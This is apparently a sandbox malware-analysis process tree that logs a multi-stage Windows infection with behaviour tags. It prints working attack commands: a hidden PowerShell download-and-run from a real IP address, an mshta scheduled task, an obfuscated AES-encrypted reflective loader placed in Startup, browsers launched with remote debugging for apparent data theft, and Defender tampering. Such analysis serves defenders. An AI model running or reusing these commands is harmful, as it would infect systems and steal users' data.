- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE"C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE"9⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd" any_word7⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:3344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "fgakTma2NsJ" /tr "mshta \"C:\Temp\NcQpdvRJC.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2176
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\NcQpdvRJC.hta"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4604
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe"C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe"C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 15207⤵
- Program crash
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe"C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe"6⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4104 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:5916 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe70f9cc40,0x7ffe70f9cc4c,0x7ffe70f9cc588⤵PID:5928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe"C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:880
-
-
C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4544
-
-
C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"7⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 7967⤵
- Program crash
PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4532 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:400 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe70f9cc40,0x7ffe70f9cc4c,0x7ffe70f9cc589⤵PID:432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:29⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2352 /prefetch:39⤵PID:1132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2360 /prefetch:89⤵PID:3404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:19⤵
- Uses browser remote debugging
PID:4740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:19⤵
- Uses browser remote debugging
PID:1904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:19⤵
- Uses browser remote debugging
PID:5140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4476 /prefetch:89⤵PID:5148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:89⤵PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:89⤵PID:5260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5024,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4212 /prefetch:89⤵PID:6032
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 9567⤵
- Program crash
PID:4200
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088426041\tYliuwV.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"7⤵
- System Location Discovery: System Language Discovery
PID:4252 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "8⤵PID:4180
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe8⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5784
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088428001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088428001\kdMujZh.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5604 -
C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"7⤵
- Executes dropped EXE
PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"7⤵
- Executes dropped EXE
PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"7⤵
- Executes dropped EXE
PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"7⤵
- Executes dropped EXE
PID:5684
-
-
C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 8167⤵
- Program crash
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe"C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe"C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe"6⤵
- Executes dropped EXE
PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\1088434001\ymy1CwP.exe"C:\Users\Admin\AppData\Local\Temp\1088434001\ymy1CwP.exe"6⤵
- Executes dropped EXE
PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe"C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6080
-
-
C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe"C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5160 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4224 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe7393cc40,0x7ffe7393cc4c,0x7ffe7393cc588⤵PID:5388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1960 /prefetch:28⤵PID:5500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:38⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2460 /prefetch:88⤵PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:18⤵
- Uses browser remote debugging
PID:4780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:18⤵
- Uses browser remote debugging
PID:3992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:88⤵PID:5688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:18⤵
- Uses browser remote debugging
PID:5604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3860 /prefetch:88⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:88⤵PID:5272
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1432 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63ad46f8,0x7ffe63ad4708,0x7ffe63ad47188⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2496
-
-
